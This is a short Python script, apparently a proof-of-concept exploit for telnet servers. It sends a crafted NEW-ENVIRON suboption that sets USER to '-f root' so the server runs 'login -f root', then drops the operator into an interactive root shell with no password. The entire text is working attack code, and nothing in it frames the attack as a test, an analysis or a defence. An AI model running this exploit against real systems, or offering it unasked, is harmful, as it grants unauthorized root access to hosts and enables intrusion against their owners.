import telnetlib import sys import time if len(sys.argv) < 2: print(f"Usage: python3 {sys.argv[0]} [port=23]") sys.exit(1) host = sys.argv[1] port = int(sys.argv[2]) if len(sys.argv) > 2 else 23 tn = telnetlib.Telnet(host, port) print(f"[+] Connected to {host}:{port}") # Basic Telnet negotiation to reach env var stage tn.sock.sendall(b"\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03") # ECHO + SGA # Craft NEW-ENVIRON with USER=-f root # IAC SB NEW-ENVIRON IS VAR USER VALUE -f root IAC SE payload = ( b"\xff\xfa\x27" # IAC SB NEW-ENVIRON b"\x01" # IS b"\x00USER" # VAR = USER b"\x01-f root" # VALUE = -f root b"\xff\xf0" # IAC SE ) tn.sock.sendall(payload) print("[+] Sent malicious USER env var") time.sleep(1.5) # Give server time to fork/exec login -f root print("[+] Interact (press Enter a few times if needed)...") tn.interact() # Hands you the shell